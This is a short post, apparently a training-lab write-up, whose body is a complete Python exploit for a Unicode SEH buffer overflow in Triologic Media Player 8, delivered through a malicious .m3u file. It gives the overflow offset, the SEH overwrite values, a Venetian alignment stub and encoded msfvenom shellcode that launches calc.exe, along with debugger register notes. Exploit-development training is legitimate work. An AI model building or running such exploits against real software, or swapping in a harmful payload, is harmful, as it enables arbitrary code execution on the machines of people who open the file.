by: chakoPosted on:

Triologic Media Player 8 Overflows (SEH_Unicode)

#!/usr/bin/python

# https://www.exploit-db.com/exploits/14673
# Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH) 
#
# SEH chain of main thread
# Address    SE handler
# 0013E270   00390072   (SEH)
# 00410038   550004C2 (nSEH)
# C95EC033   *** CORRUPT ENTRY ***
#
# ./pattern_offset.rb -q 39724138
# [*] Exact match at offset 536
#
#
# SEH chain of main thread
# Address    SE handler
# 0013E270   triomp8.00420042
# 00430043   05FC45C6
# FFFFFD74   *** CORRUPT ENTRY ***
#
#
#
# EAX : 0013E270
# EBX : 0013B410
# ECX : 0013B428
# EDX : 7C90327A     ntdll.7C90327A
# EBP : 7C9032BC     ntdll.7C9032BC
# ESP : 0013B370
# ESI : 0013E270
# EDI : 0013B3FC
# EIP : 0013E279
#reg after eSEH
# choose ebx for practice (eax is closer to our shellcode)


file = "exploit.m3u"

nSEH = "\x61\x6e" #popad + nop/align
#nSEH = "\x61\x41" #popad + nop/align

# 0x004a0041 : pop ebp # pop ebx # ret  | startnull,unicode,asciiprint,ascii 
#                       {PAGE_EXECUTE_READWRITE} [triomp8.exe] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.0.0 
# (C:\Program Files\Triologic\Triologic Media Player\triomp8.exe)
SEH = "\xF2\x41"



# msfvenom -p windows/exec cmd=calc.exe -f raw -o calc.raw -a x86
# ./alpha2 eax --unicode --uppercase < calc.raw
# Payload size: Payload size: 193 bytes
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIA"
"J11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB94"
"4JBKLYXU2M0KPKP1PDIYUNQ7PQTTK0PP04KB2LLTK0RN44K2RNHLOWG0JMVNQKO"
"VLOL1QCLM2NLMPGQ8OLMM1Y7K2KBB2PW4KPRN04KOZOLTK0LN1CHYSOXM18QPQT"
"KPYO0KQYCTKOYMHK3NZOYTKOD4KKQZ6NQKOVLY18OLMM1WWP8YP3EZVM3SML8OK"
"3MNDT5JDPXTKPXMTKQJ3RFDKLLPK4KR8MLKQ8STKM4TKKQJ0SYOTNDMTQKQK1QP"
"YPZPQKOYPQO1OQJ4KMBJKTMQM1ZKQTMSUWBKPM0KPR0QXNQTKRO3WKOJ5WKJP7E"
"W2PVS8EV4UGMUMKOIEOLKVSLKZSPKK9PBULEGKPGLS2RRORJM0PSKOZ5QS1QBL2"
"CNN354835KPA")


print("\n\n[+] eCXD class lab - Windows SEH_Unicode Overflows")
print("[+] Triologic Media Player 8 Overflows (SEH_Unicode) --   test on XP Pro SP3 ENG")
print("[+] Chako\n\n\n")


print("[-] crafting payload...\n")



buffer = "\x41" * 536
buffer += nSEH 	            # popad + nop/align
buffer += SEH 	            # pop,pop,retn triomp8.exe unicode (universal)
buffer += "\x90"	        # 
buffer += "\x6e" 	        # venetian shellcode

align = (
"\x53"                      #push EBX
"\x6e"                      #Venetian Padding
"\x58"                      #pop EAX
"\x6e"                      #Venetian Padding
"\x05\x37\x13"              #add eax, 0x13003700
"\x6e"                      #Venetian Padding     
"\x2d\x08\x13"              #sub eax, 0x13000800
"\x6e"                      #Venetian Padding
"\x50"                      #push EAX
"\x6e"                      #Venetian Padding
"\xC3"                      #RETN
)                #align to shellcode

 
buffer += align
buffer += "\x90" * 59
buffer +=shellcode
buffer += "\x90" * (5000 - len(buffer))

f = open (file, "w")
f.write (buffer)
f.close ()
print "[+] File saved as " + file